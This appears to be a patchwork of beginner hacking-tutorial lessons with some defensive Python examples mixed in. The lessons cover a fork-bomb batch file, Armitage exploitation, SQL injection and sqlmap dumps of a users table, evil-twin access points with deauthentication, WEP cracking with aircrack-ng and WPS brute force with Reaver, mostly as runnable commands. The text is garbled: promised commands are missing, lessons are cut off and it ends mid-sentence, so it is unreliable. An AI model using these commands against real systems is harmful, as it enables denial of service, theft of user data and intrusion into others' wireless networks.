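Two steps above come down to the same bit of parsing: the hash-identifier step (telling a 13-character DES crypt hash such as 24iYBc17xK0e. from the modern crypt(3) formats) and the unshadow step (joining /etc/passwd with /etc/shadow). The following is an added example, not the tutorial's own commands, that does both and turns them into an audit of your own system: it reports which accounts still carry hashes that a wordlist run like the one just described would finish quickly. The passwd and shadow lines are constructed; the $6$ and $y$ hash bodies are placeholders, not real digests, and the weak/ok grades are this example's own.

```python
"""Merge passwd/shadow the way unshadow does, then grade each hash format (added example)."""
import re

# Constructed files (not copied from any system). Placeholder hash bodies are not real digests.
PASSWD_LINES = [
    "root:x:0:0:root:/root:/bin/bash",
    "happy:x:1001:1001::/home/happy:/bin/bash",
    "legacy:x:1002:1002::/home/legacy:/bin/sh",
    "svc:x:1003:1003::/var/lib/svc:/usr/sbin/nologin",
    "guest:x:1004:1004::/home/guest:/bin/bash",
]
SHADOW_LINES = [
    "root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:19000:0:99999:7:::",
    "happy:$y$j9T$PLACEHOLDERSALT$PLACEHOLDERHASH:19000:0:99999:7:::",
    "legacy:24iYBc17xK0e.:19000:0:99999:7:::",
    "svc:*:19000:0:99999:7:::",
    "guest::19000:0:99999:7:::",
]

# crypt(3) identifier prefixes -> (scheme, grade). The grades are this example's assumptions.
PREFIXES = {
    "$1$": ("md5-crypt", "weak"),
    "$2a$": ("bcrypt", "ok"), "$2b$": ("bcrypt", "ok"), "$2y$": ("bcrypt", "ok"),
    "$5$": ("sha256-crypt", "ok"),
    "$6$": ("sha512-crypt", "ok"),
    "$7$": ("scrypt", "ok"),
    "$y$": ("yescrypt", "ok"),
}
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")  # 2-character salt + 11-character hash


def classify_hash(field):
    """Map a shadow password field to (scheme, grade)."""
    if field == "":
        return "empty", "critical"      # no password required at all
    if field.startswith(("*", "!")):
        return "locked", "n/a"          # no usable hash; password login disabled
    for prefix, result in PREFIXES.items():
        if field.startswith(prefix):
            return result
    if DES_CRYPT.match(field):
        return "des-crypt", "weak"      # 8-char limit, 12-bit salt, fast to brute force
    return "unknown", "review"


def unshadow(passwd_lines, shadow_lines):
    """Replace the 'x' in passwd's second field with the hash from shadow."""
    hashes = {}
    for line in shadow_lines:
        name, field = line.split(":", 2)[:2]
        hashes[name] = field
    merged = []
    for line in passwd_lines:
        fields = line.split(":")
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def audit(passwd_lines, shadow_lines):
    """Return {username: (scheme, grade)} for every account in passwd."""
    report = {}
    for line in unshadow(passwd_lines, shadow_lines):
        fields = line.split(":")
        report[fields[0]] = classify_hash(fields[1])
    return report


if __name__ == "__main__":
    for user, (scheme, grade) in audit(PASSWD_LINES, SHADOW_LINES).items():
        print(f"{user:8} {scheme:14} {grade}")
```

On a real host, read the two files as root and pass their lines to audit(); the accounts graded weak or critical are the ones to migrate to sha512-crypt or yescrypt (or lock) before anyone runs a wordlist against them.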
Basic Concept
It uses the fact that while a service can be more than sufficient to cater to the demands
of the desired users, a drastic increase in unwelcome users can make the service go
down. Most of us use phrases like "This website was down the other day" without
any idea what it actually means. Well, now you do. To give you a good idea of what is
happening, I'll take the example from the movie "We Are Legion".
So while this may seem impossible in the real world, in the virtual world you can
cause as much load as a thousand (or even a million) users alone at the click of a
button. There are many tools out there for this purpose; however, you are not
recommended to use them, as a DoS on someone else is illegal and easy to
detect (Knock, knock. It's the police). We will come back to this later and do a DoS
on our own computer.
What basically happened is that the one-line command asked the operating system to
keep opening processes very fast for an infinite period of time. It just gave up.
Here's something for the Windows users
Crashing Windows using a batch file
Open Notepad. Put the following code in it:
:1
Start
goto 1
Save the file as name.bat
Bat here is the bat
ch file extension. Run it. Game over.
It basically executes the second line, and the third line makes it go back to the first,
execute the second, and then back to the first again, execute the second... infinitely. So
again, denial of service. All the processing power is used by a useless command,
while you, the legitimate user, can't do anything.
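Both the one-line command and the batch loop above only take a machine down when nothing caps how many processes one user may create. On Linux that cap is the RLIMIT_NPROC resource limit, normally set by pam_limits from /etc/security/limits.conf (the shell shows it as ulimit -u). The following is an added example, not part of the tutorial: effective_limit() evaluates a limits.conf text for one user according to the documented precedence (a user line over an @group line over a * line, with group and wildcard lines never applied to root); treating a later line of the same class as overriding an earlier one is this example's own assumption. live_nproc_limit() reads the limit the current process actually runs under. The configuration text is constructed.

```python
"""Check the per-user process limit that contains a fork-style DoS (added example)."""
import resource

# Constructed limits.conf content, not copied from any system.
CONSTRUCTED_LIMITS_CONF = """\
# <domain>  <type>  <item>  <value>
*           soft    nproc   4096
*           hard    nproc   8192
@devs       soft    nproc   2048
felix       hard    nproc   3000
felix       -       nofile  65536    # '-' sets soft and hard; different item, ignored below
"""

UNLIMITED = float("inf")
_PRIORITY = {"user": 0, "group": 1, "wildcard": 2}  # lower number wins


def effective_limit(conf_text, user, groups, item="nproc"):
    """Return (soft, hard) for `item`; None where no line applies, UNLIMITED for 'unlimited'."""
    best = {"soft": (99, None), "hard": (99, None)}
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) != 4 or parts[2] != item:
            continue
        domain, ltype, _, value = parts
        if domain == user:
            cls = "user"
        elif user == "root":
            continue                      # group and * lines are not applied to root
        elif domain.startswith("@") and domain[1:] in groups:
            cls = "group"
        elif domain == "*":
            cls = "wildcard"
        else:
            continue
        limit = UNLIMITED if value == "unlimited" else int(value)
        for kind in (("soft", "hard") if ltype == "-" else (ltype,)):
            if _PRIORITY[cls] <= best[kind][0]:  # same-class later line overrides (assumption)
                best[kind] = (_PRIORITY[cls], limit)
    return best["soft"][1], best["hard"][1]


def live_nproc_limit():
    """(soft, hard) RLIMIT_NPROC of this process; None means unlimited."""
    soft, hard = resource.getrlimit(resource.RLIMIT_NPROC)
    inf = resource.RLIM_INFINITY
    return (None if soft == inf else soft, None if hard == inf else hard)


if __name__ == "__main__":
    print("felix (in devs):", effective_limit(CONSTRUCTED_LIMITS_CONF, "felix", {"devs"}))
    print("root:           ", effective_limit(CONSTRUCTED_LIMITS_CONF, "root", {"devs"}))
    print("this process:   ", live_nproc_limit())
```

A result of (None, None) for a non-root user means nothing in the file bounds that user's process count, so the loop described above would run until the kernel exhausts its process table; a finite soft limit makes the fork call fail instead, and the rest of the system stays usable.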
Lesson 10: Introduction to Python
Python is a very diverse programming language and is excellent to learn. Today at codingsec we will run
through an introductory tutorial to get you more familiar with how the fundamentals of the language work. The
best way to learn to code is to actually put what you read today into practice!
Installing Python
In order to get started on learning Python, you will need to install the required software. For Python
programming you need a working Python installation and a text editor.
To download the required software please visit http://www.python.org/download; you will find numerous download
links there. Python is very diverse and compatible with whatever operating system you are using.
You are probably lucky and Python is already installed on your machine. To test it, type python3 on a
command line. If you see something like the output in the following section, you are set.
If you have to install Python, first try to use the operating system's package manager or go to the repository
where your packages are available and get Python 3. Python 3.0 was released in December 2008; all the
distributions should have Python 3 available, so you may not need to compile Python 3 from scratch after
downloading the source code. Ubuntu and Fedora do have Python 3 binary packages available, but they are
not yet the default, so they need to be installed specially.
Download the .tgz file (use your Web browser to get the gzipped tar file
from https://www.python.org/downloads/release/python-341). Uncompress the tar file (put in the correct path to
where you downloaded it):
$ tar -xvzf ~/Download/Python-3.4.1.tgz
... list of files as they are uncompressed ...
Change to the directory and tell the computer to compile and install the program:
$ cd Python-3.4.1/
$ ./configure --prefix=$HOME/python3_install
... lots of output. Watch for error messages here ...
$ make
... even more output. Hopefully no error messages ...
$ make install
Add Python 3 to your path. You can test it first by specifying the full path. You should add
$HOME/python3_install/bin to your PATH bash variable.
$ ~/python3_install/bin/python3
Python 3.4.1 (... size and date information ...)
[GCC 4.5.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>
The above commands will install Python 3 to your home directory, which is probably what you want, but if you
skip the --prefix, it will install it to /usr/local. If you want to use the IDLE graphical code editor, you
need to make sure that the tk and tcl libraries, together with their development files, are installed on the
system. You will get a warning during the make phase if these are not available.
MAC USERS
Starting from Mac OS X (Tiger), Python ships by default with the operating system, but you will need to update
to Python 3 until OS X starts including Python 3 (check the version by starting python3 in a command line
terminal). Also IDLE (the Python editor) might be missing in the standard installation. If you want to (re-)install
Python, get the MacOS installer from the Python download site.
WINDOWS USERS
Download the appropriate Windows installer (the x86 MSI installer, if you do not have a 64-bit AMD or Intel
chip). Start the installer by double-clicking it and follow the prompts.
The PATH environment variable is a list of folders, separated by semicolons, in which Windows will look for a
program whenever you try to execute one by typing its name at a Command Prompt. You can see the current
value of your PATH by typing this command at a Command Prompt:
echo %PATH%
The easiest way to permanently change environment variables is to bring up the built-in environment variable
editor in Windows. How you get to this editor is slightly different on different versions of Windows.
On Windows 8: Press the Windows key and type Control Panel to locate the Windows Control Panel.
Once you've opened the Control Panel, select View by: Large Icons, then click on System. In the window that
pops up, click the Advanced System Settings link, then click the Environment Variables... button.
On Windows 7 or Vista: Click the Start button in the lower-left corner of the screen, move your mouse
over Computer, right-click, and select Properties from the pop-up menu. Click the Advanced System
Settings link, then click the Environment Variables... button.
On Windows XP: Right-click the My Computer icon on your desktop and select Properties. Select
the Advanced tab, then click the Environment Variables... button.
Once you've brought up the environment variable editor, you'll do the same thing regardless of which version of
Windows you're running. Under System Variables in the bottom half of the editor, find a variable
called PATH. If there is one, select it and click Edit.... Assuming your Python root is C:\Python34, add
these two folders to your path (and make sure you get the semicolons right; there should be a semicolon
between each folder in the list):
C:\Python34
C:\Python34\Scripts
Note: If you want to double-click and start your Python programs from a Windows folder and not have the
console window disappear, you can add the following code to the bottom of each script:
INTERACTIVE MODE
Go into IDLE (also called the Python GUI). You should be presented with a window that has some text like this:
Python 3.0 (r30:67503, Dec 29 2008, 21:31:07)
[GCC 4.3.2 20081105 (Red Hat 4.3.2-7)] on linux2
Type "copyright", "credits" or "license()" for more information.
****************************************************************
Personal firewall software may warn about the connection IDLE makes to its subprocess using this computer's internal loopback interface. This connection is not visible on any external interface and no data is sent to or received from the Internet.
****************************************************************
IDLE 3.0
>>>
The >>> is Python's way of telling you that you are in interactive mode. In interactive mode what you type is
immediately run. Try typing 1+1 in. Python will respond with 2. Interactive mode allows you to test out and see
what Python will do. If you ever feel you need to play with new Python statements, go into interactive mode and
try them out.
Go into IDLE if you are not already. In the menu at the top, select File then New File. In the new window that
appears, type the following:
Now save the program: select File from the menu, then Save. Save it as hello.py (you can save it in any folder
you want). Now that it is saved it can be run.
Next run the program by going to Run then Run Module (or if you have an older version of IDLE
use Edit then Run script). This will output Hello, World! in the Python Shell window.
It is very useful to stick to some rules regarding the file names of Python programs. Otherwise some
things might go wrong unexpectedly. These don't matter as much for programs, but you can have weird
problems if you don't follow them for module names (modules will be discussed later).
Always save the program with the extension .py. Do not put another dot anywhere else in the file name.
Only use standard characters for file names: letters, numbers, dash (-) and underscore (_).
White space ( ) should not be used at all (use underscores instead).
Do not use anything other than a letter (particularly no numbers!) at the beginning of a file name.
Do not use non-English characters in your file names, or, even better, do not use them at all when programming.
If you don't want to use Python from the command line, you don't have to; just use IDLE. To get into interactive
mode just type python3 without any arguments. To run a program, create it with a text editor (Emacs has a
good Python mode) and then run it with python3 program_name.
If you are using Unix (such as Linux, Mac OS X, or BSD), and you make the program executable with chmod and
have as the first line:
you can run the python program with ./hello.py like any other command.
Installing Metasploit
Now Metasploit is not distributed with Kali Linux (it was distributed with BackTrack
though). However, Kali has it in its repositories, and it can be easily downloaded and
installed by executing-
apt-get install armitage
It will check dependencies, download the required files and install Armitage for
you. After it's done, you can start Armitage by using the following command-
You will get a screen like this. Leave the settings as they are, and click Connect.
You'll get a prompt like this (most of the time).
Now you'll see Armitage making some connections for you. For a short while it might
show failure messages (Connection Refused), but after some time Armitage will start.
And you'll end up with a window somewhat like this.
Now while I do believe that the developer has succeeded in making a tool which
permits me to say "I'll take my leave, you can handle stuff from here", I'd still go
on for a while, helping you learn some basic stuff before I take my leave.
Armitage Basics
Now the tough coding (honestly there wasn't anything tough about it) that you had
to do with Metasploit becomes as easy as a click in Armitage. Better yet, you can see
exactly what line of code is actually executed when you do something with your
mouse. As a start, you should do a quick scan with OS detect.
And while it does ask you to enter some stuff now, it is going to be pretty easy; you
just have to follow the example given by Armitage with some modification.
First do your old ifconfig in a new terminal to find your IP
ifconfig
Notice that most of the time, the first 6 digits are 192.168. You have to figure out the
next 3 digits. After that, you can enter the IP into the Armitage window. Look at the
sample it provided, just copy that, replacing the 1 with 154 as in my case.
Your final input should be 192.168.154.0/24. The /24 means it'll look at all the IPs in
that block: it scans 192.168.xxx.0 through 192.168.xxx.255 (256 addresses, not .1 to
.256). Most of the time, you'll find your host in this range;
however, to include all IPs from 192.168.0.0 to 192.168.255.255, you may
use 192.168.0.0/16.
Now, after a few seconds, you will see the following message, and it tells you exactly
what you're supposed to do next.
Now a couple of computers with their respective OS icons will show up on your screen. As
expected, you'll have to go to Attacks -> Find Attacks. There's no rocket science here,
and I'm not putting in any more screenshots. After that, right-click on the computer you
want to hack, and you'll see an attack option. Select whichever you want to try, and enter
the requisites (you learnt how to do information gathering in the previous Metasploit
tutorials). Everything will be quite easy, except for the fact that the exploits in the attack
section will be possible exploits, which might or might not work. If you're expecting a
click to hack you a Windows 7 machine, then that's just not happening. It might work
with an unpatched XP machine; ms03_026_dcom might do the trick, or the netapi
one. Good luck playing around with this tool. And here's the official Armitage
website (media section link; useful videos and pics there) where you might find some
more guidance, though the tool doesn't need any.
Lesson 12: SQL Injection Basics
Introduction
Let's get started at an apparently unrelated point. Let's assume we create a table in
SQL. Now there are three main parts of working with a database management system, like SQL.
They are -
Creating the structure of the table
Entering data
Making queries (and getting meaningful results from the data)
Now, when SQL is used to display data on a web page, it is common to let web users
input their own queries. For example, if you go to a shopping website to buy a
smartphone, you might want to specify what kind of smartphone you want. The site
would probably be storing data about phones in a table with columns like Name, Price,
Company, Screen Size, OS, etc.
Now they allow you to create a query using some sort of user-friendly drop-down
based form which lets you select your budget, preferred company, etc. So basically,
you, the user, can create queries and request data from their SQL servers.
Now while this automated method of creating queries for you is relatively safe, there is
another method of creating queries which can be exploited by us. A URL ending in .php
is a direct indication that the website/blog uses SQL to deliver a lot of its data, and that
you can execute queries directly by changing the URL. Now basically the data in the
SQL tables is protected. However, when we send some rogue commands to the SQL
server, it doesn't understand what to do, and returns an error. This is a clear indication
that with proper coding, we can send queries that will make the database 'go berserk'
and malfunction, and give us all the otherwise private data of its tables. This attack
can be used to obtain confidential data like a list of usernames and passwords of all
users on a website.
Steps
1. We have to find a website which is vulnerable to SQL injection (SQLi) attacks.
Vulnerability has 2 criteria. Firstly, it has to allow execution of queries from
the url, and secondly, it should show an error for some kind of query or the
other. An error is an indication of a SQL vulnerability.
2. After we know that a site is vulnerable, we need to execute a few queries to
know what all makes it act in an unexpected manner. Then we should obtain
information about SQL version and the number of tables in database and
columns in the tables.
3. Finally we have to extract the information from the tables.
Vulnerabilities are found using your own creativity along with famous dorks (more on
this in a later tutorial).
For the 2nd and 3rd steps, there are 2 ways to do them-
Manually, using some standard code available online (and if you know SQL then you
can figure most of the stuff out yourself). For example, you can instruct the database
to give you all the data from a table by executing the command-
SELECT * FROM Users WHERE UserId = 105 or 1=1
Now, while the first part of the query, UserId = 105, may not be true for all users, the
condition 1=1 will always be true. So basically the query will be prompted to return
the data for all the users for whom 1=1, that is, for everyone. Effectively, you have the
usernames and passwords and all other information about all the users of the website.
The first command is legitimate and gives you access to the data of srinivas only, and only in the case where the
password is correct. The second statement gives you access to the data of all accounts.
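The query above, run both ways against a small SQLite table, as an added example that is not part of the original tutorial: the Users rows are constructed, `vulnerable_lookup` pastes the URL parameter into the SQL text exactly as the lesson describes, and `safe_lookup` is the fix a developer would ship (validate, then bind the value with a placeholder).

```python
import sqlite3

# Constructed sample rows standing in for the site's Users table (made-up
# names and addresses; nothing here comes from a real site).
SAMPLE_USERS = [
    (105, "srinivas", "srinivas@example.com"),
    (106, "alice", "alice@example.com"),
    (107, "bob", "bob@example.com"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database holding the constructed Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserId INTEGER PRIMARY KEY, Name TEXT, Email TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id_from_url: str) -> list:
    """The pattern the lesson describes: the URL parameter is pasted straight
    into the SQL text, so '105 or 1=1' becomes part of the WHERE clause and
    the condition is true for every row."""
    sql = f"SELECT * FROM Users WHERE UserId = {user_id_from_url}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, user_id_from_url: str) -> list:
    """The fix: validate the parameter as an integer and bind it with a
    placeholder. User text never becomes SQL, so 'or 1=1' is just a
    non-numeric string and is rejected before any query runs."""
    try:
        user_id = int(user_id_from_url)
    except ValueError:
        return []
    return conn.execute("SELECT * FROM Users WHERE UserId = ?", (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for param in ("105", "105 or 1=1"):
        print(f"{param!r}: vulnerable -> {len(vulnerable_lookup(db, param))} rows,"
              f" safe -> {len(safe_lookup(db, param))} rows")
```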
Using some tool - Some tools help in making the process easier. You still have to use
commands, but using tools is much more practical after you have an idea what is
actually happening. I don't recommend all the GUI Windows tools which are found on
malware-filled websites, and never work. Throughout this blog we have used Kali
Linux, and if you really are serious about hacking, there is no reason not to have Kali
Linux installed. In Kali Linux, there is a great tool called SQLMap that we'll be using.
That's it for this tutorial; you now know how SQL injections work. It might be worth
your time learning some SQL on W3Schools till I come up with some other tutorial.
Lesson 13: More SQLMap
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
Sometimes, using the --time-sec option helps to speed up the process, especially when the
server responses are slow.
The final result of the above command should be something like this.
Note: Depending on a lot of factors, sqlmap may sometimes ask you questions which
have to be answered yes/no. Typing y means yes and n means no. Here are a few
typical questions you might come across-
Some message saying that the database is probably MySQL, so should sqlmap skip all
other tests and conduct MySQL tests only. Your answer should be yes (y).
Some message asking you whether or not to use the payloads for specific versions of
MySQL. The answer depends on the situation. If you are unsure, then it's usually better
to say yes.
Enumeration
Database
In this step, we will obtain the database name, column names and other useful data from
the database.
So first we will get the names of the available databases. For this we will add --dbs to our
previous command. The final command will look like -
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
Table
Now we are obviously interested in the acuart database. information_schema can be
thought of as a default table which is present on all your targets, and contains
information about the structure of databases, tables, etc., but not the kind of information
we are looking for. It can, however, be useful on a number of occasions. So, now we
will specify the database of interest using -D and tell sqlmap to list the tables using
the --tables option. The final sqlmap command will be-
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
The result should be something like this -
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+
Now we have a list of tables. Following the same pattern, we will now get a list of
columns.
Columns
Now we will specify the database using -D, the table using -T, and then request the
columns using --columns. I hope you guys are starting to get the pattern by now. The
most appealing table here is users. It might contain the usernames and passwords of
registered users on the website (hackers always look for sensitive data).
The final command must be something like-
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
The result would resemble this-
Data
Now, if you were following along attentively, you would expect that we will now be getting data from one of
the columns. While that hypothesis is not completely wrong, it's time we go one step
ahead. Now we will be getting data from multiple columns. As usual, we will specify
the database with -D, the table with -T, and the columns with -C. We will get all data from the
specified columns using --dump. We will enter multiple columns and separate them
with commas. The final command will look like this.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump
John Smith, of course. And the password is test. Email is email@email.com?? Okay,
nothing great, but in real-world web pentesting you can come across more
sensitive data. Under such circumstances, the right thing to do is mail the admin of the
website and tell him to fix the vulnerability ASAP. Don't get tempted to join the dark
side. You don't look pretty behind bars. That's it for this tutorial. Try to look at
other columns and tables and see what you can dig up.
Lesson 14: Evil Twin
You will also need to install a tool (bridge utils) which doesn't come pre-installed in
Kali. No big deal-
apt-get install bridge-utils
Objectives
The whole process can be broken down into the following steps-
1. Finding out about the access point (AP) you want to imitate, and then actually
imitating it (i.e. creating another access point with the same SSID and
everything). We'll use airmon-ng for finding the necessary info about the network,
and airbase-ng to create its twin.
2. Forcing the client to disconnect from the real AP and connect to yours.
We'll use aireplay-ng to deauthenticate the client, and strong signal strength to
make it connect to our network.
3. Making sure the client doesn't notice that he connected to a fake AP. That
basically means that we have to provide internet access to our client after he
has connected to the fake wireless network. For that we will need to have
internet access ourselves, which can be routed to our client.
4. Have fun - monitor traffic from the client, maybe hack into his computer using
Metasploit.
PS: The first 3 are primary objectives; the last one is optional and not a part of the evil
twin attack as such. It is rather a man-in-the-middle attack. Picture credits: firewalls.com
Information Gathering - airmon-ng
To see available wireless interfaces-
iwconfig
Note: If you are unable to get your client to connect to you, there is another
option: you can leave him with no options. If you keep transmitting the deauth
packets continuously (i.e. don't press Ctrl+C after the client has disconnected), he
will have no choice but to connect to you. However, this is quite an unstable
situation, and the client will go back to the real twin as soon as it gets the chance.
Have fun
Now that the client is using the internet via our evil interface, we can do some evil
stuff. This actually comes under a Man In The Middle attack (MITM), and I'll write a
detailed tutorial for it later. However, for the time being, I will give you some idea
what you can do.
For everyone
My Dlink Adapter
This is what it looks like on my Windows machine (I blurred the names a bit. It's a sort of convention, I guess).
What now
Now since we have multiple adapters, we can use one of them to create a wireless
network on Windows and then practice hacking it on a virtual Kali Linux machine.
This is our newly created network. Now we can turn on our Kali machine and see if it
is discovered there.
So it showed up pretty fine. We can use netsh to modify the security parameters as
necessary (WEP, WPA, etc.) and practice our hacking skills on our dummy wifi
network.
Lesson 17: Speeding up WEP Hacking in Kali Linux
Now if you have followed the basic WEP hacking tutorial, then you are ready to
proceed to the stage where you follow an intermediate level hacking tutorial. In this
tutorial, we will look at the intricate details of what is happening and approach the
complicated methods and concepts.
1. Are you using Kali Linux on a virtual machine? Please note that a wireless adapter can
only be used by one machine at a time. Your host machine has access to the
wireless adapter, not the virtual machine. This question has been discussed at length
on the SuperUser forums. The conclusion is that you can't directly connect an internal wifi card
using any virtual machine software-
"Unfortunately no virtualization software allows for direct access to hardware devices
like that.
Compare VirtualBox with VMware Fusion and Parallels for Mac. All 3 of those
programs behave the same way. The only devices that can be directly accessed are
USB devices. Everything else is abstracted through the virtualization engine. (Though
you could argue that the VM has lower level access to CD-ROMs and storage devices.)
I wish I could give you a better answer than simply to buy a USB wireless card."
Basically you have to buy an external wireless card. They aren't very expensive. I
personally use two of them myself. If you want to see what I use, take a look
here: http://beginnnerhacking.blogspot.in/2014/02/creating-dummy-wifi-for-hacking.html
So basically you have 2 choices. First, you can buy a new external wireless adapter
(no referral links here). Secondly, you can install Kali alongside Windows or run it via
a USB. A virtual machine can only use computer hardware if it is externally
connected via USB. Now there is another catch here. The internal adapters, almost all
of them, don't support injection. This is extremely important for speeding up wireless
hacking. So if you really want to go in depth into wireless hacking, then it's time to buy
an external adapter or two (the more the better). If that's not a possibility, you might
want to spend hours trying to get a driver which might make your internal adapter
support injection (I don't know anyone who succeeded in this, but it might be
possible).
Kali Linux
I don't know why it needs mention here, but still, if you don't have Kali Linux (or
Backtrack) installed yet, you will have to install it before you can start this tutorial.
Check Injection Support
Aircrack-ng has a comprehensive article related to checking injection support. You
might check their website out for it. I am just providing the commands which will be
enough to find out whether injection is working or not.
airmon-ng start wlan0 [or wlan1]
(Puts your wireless adapter in monitor mode. From now on we'll refer to wlan0/wlan1 as
mon0.)
airserv-ng -d mon0
aireplay-ng -9 127.0.0.1:666
This basically sets up a temporary server sort of thing that is waiting for you to test
your injection capabilities. The second command actually tries to inject into the server, and
succeeds. 127.0.0.1 is the IP which is reserved for loopback. It is always used when
you are carrying out some command on yourself. 666 is the port we are using. Most of
the time, what follows an IP and a colon is the port. The general form is somewhat
like IP:port. So finally you have checked your injection capabilities, and the last line
- "Injection is working!" should bring a smile to your face. If not, you'll have to buy a
card which supports injection, or see some forum posts which will help you figure
something out.
ESSID - DIGISOL
BSSID - 00:17:7C:22:CB:80
CH (channel) - 2
Mac address of genuine users connected to the network:
Interface : wlan1 - referred to as mon0
You should gather the equivalent information for the network you will be working on.
Then just change the values whenever I use them in any of the commands
Note : We need at least one user (wired or wireless) connected to the network
and using it actively. The reason is that this tutorial depends on receiving at least
one ARP request packet and if there are no active clients then there will never be
any ARP request packets.
Now, to check whether the signal strength will be sufficient, we will simply execute
the following code-
airodump-ng [interface] -c [channel]
airodump-ng mon0 -c 2
This will make the wireless card only read packets in the channel no. 2, on which our
target network is.
The last time we checked whether the wireless card had the capability to inject
packets. We tested it on our own computer. This time, we actually injected packets
into the target computer. If this worked, then it's pretty good news, and it means that
you are most probably going to be able to hack this network. The last line 30/30 :
100% determines how good the strength of the signal is. A very high percentage is a
good sign, and 100 is ideal.
Capture Packets
Now we have already run airodump-ng a couple of times. However, this time we will
pass the -w option, which will instruct airodump-ng to save the output to a file.
airodump-ng -c [channel] --bssid [bssid] -w [file_name] [interface]
airodump-ng -c 2 --bssid 00:17:7C:22:CB:80 -w dump mon0
Speeding Things Up
Fake Authentication
Now to speed things up, we will inject packets into the network. We will thus obtain ARP packets.
These packets will fill up the data column of our airodump-ng capture, and data is
what will help us obtain the password. As soon as we have 10000 data packets, we
can start attempting to get the password using aircrack-ng.
Now to make the AP pay attention to your injected packets, you either have to be a
connected client, or have to pretend to be one. You can either mask your MAC address
as one of the already connected clients, or use the fake authentication feature. We will
do the latter. (If you see an error like "the AP is on channel x and mon0 is on channel y",
then go to the bottom of the post for troubleshooting.)
aireplay-ng -1 0 -e DIGISOL -a 00:17:7C:22:CB:80 mon0
Slow start
The video shows how fast the IVs flowed in after ARP injection started.
Cracking the network
Cracking the network is as easy as typing the following into the console
aircrack-ng name_of_file-01.cap
In our case, the command will be
aircrack-ng dump-01.cap
After pressing enter, you will have a list of networks and you'll be prompted to select
which one of them to hack. In my case there was just one network, so I couldn't get
that screen, or a screenshot. The password was cracked in less than a second.
Troubleshooting
A person commented on another wireless hacking post. This is the problem he faced.
Whenever I try to use aireplay-ng with the options, it always fails saying that mon0 is in channel -1 and the target is in
another channel. How can I fix this? I looked a lot for a real answer but nobody knows what this is.
I was facing this problem when my mon0 kept hopping from one channel to the other, and the second step alone
solved my problem. If your airmon-ng assigns itself a fixed channel of its own will, without you even specifying it,
then the problem might be more complicated. If the above steps don't solve the problem, take a look here:
http://ubuntuforums.org/showthread.php?t=1598930
Lesson 18: Hack WEP with WPS enabled
So that'll take approximately 3 hours. And that's all the combinations, and most
probably the correct pin will not be the last combination, so you can expect to reach
the result earlier. However, the assumption is that bruteforcing will take place at a key
per second. My personal best is a key every 2 seconds, and yours might drop to as low
as a key every 10 seconds.
And if you are already familiar with hacking WEP, then just go to your Kali Linux
terminal and type the above command (replacing what needs to be replaced). Leave
your machine as is, come back 10 mins later, check the progress (it must be 1%
or something), and go take a nap. However, if you're a newbie, then tag along.
Kali Linux
First off, you need to have Kali Linux (or BackTrack) up and running on your machine.
Any other Linux distro might work, but you'll need to install Reaver on your
own. (Reaver has a known issue: sometimes it doesn't work with virtual machines,
and you might have to do a live boot using a live CD or live USB of Kali Linux. See the
last section of this post on troubleshooting by scrolling down a bit.)
Information Gathering
Now you need to find out the following about your target network-
Does it have WPS enabled? If not, then the attack will not work.
The BSSID of the network.
Now to check whether the network has WPS enabled or not, you can either
use wash or just use the good old airodump-ng. Wash is specifically meant to check
whether a network has WPS enabled or not, and is thereby much easier to use. Here
are the steps-
This is an error which I haven't figured out yet. If you see it, then you'll have to do some homework, or move
on to the airodump method. Update: wash -i mon0 --ignore-fcs might solve the issue.
Use airodump-ng. It will show all networks around you. It tells which of them use
WPA. You'll have to assume they have WPS, and then move to the next steps.
airodump-ng mon0
None of them has WPS enabled, just saying.
BSSID of the network - Now irrespective of what you used, you should have a
BSSID column in the result that you get. Copy the BSSID of the network you want to
hack. That's all the information you need.
Reaver
Now finally we are going to use Reaver to get the password of the WPA/WPA2
network. Reaver makes hacking very easy, and all you need to do is enter-
After some hours, you will see something like this. The pin in this case was
intentionally 12345670, so it was hacked in 3 seconds.
Here is an extra section, which might prove useful (or more like consoling, to let you
know you are not the only one who is having troubles)
Known problems that are faced - Troubleshooting
1. As in the pic above, you saw the first line read "Switching wlan0 to channel 6".
(Yours will be mon0 instead of wlan0). Sometimes, it keeps switching
interfaces forever.
2. Sometimes it never gets a beacon frame, and gets stuck in the waiting for
beacon frame stage.
3. Sometimes it never associates with the target AP.
4. Sometimes the response is too slow, or never comes, and a (0x02) or something
error is displayed.
In most cases, such errors suggest-
1. Something wrong with wireless card.
2. AP is very choosy, won't let you associate.
3. The AP does not use WPS.
4. You are very far from the AP.
Possible workarounds-
1. Sometimes, killing naughty processes helps. (see pictures below)
2. Move closer to target AP
3. Do a fakeauth using aireplay-ng (Check speeding up WEP hacking) and tell
Reaver not to bother as we are already associated using -A (just add -A at the
end of your normal reaver code)
4. If you are using Kali Linux in VMware, try booting into Kali using USB. I don't
know why, but sometimes internal adapters work wonders, and can't be used
from inside of a VM. In my case, booting up from USB and using the internal
adapter increased the signal strength and sped up the bruteforce
process. Update: It has nothing to do with the internal adapter. I have verified
my observation with various hackers, and it is now a known problem with
Reaver. It does not work well inside virtual machines. It is recommended
that you do a live boot.
Now the first step is conceptually easy. What you need is you, the attacker, a client
who'll connect to the wireless network, and the wireless access point. What happens is
when the client and access point communicate in order to authenticate the client, they
have a 4-way handshake that we can capture. This handshake has the hash of the
password. Now there's no direct way of getting the password out of the hash, and thus
hashing is a robust protection method. But there is one thing we can do. We can take
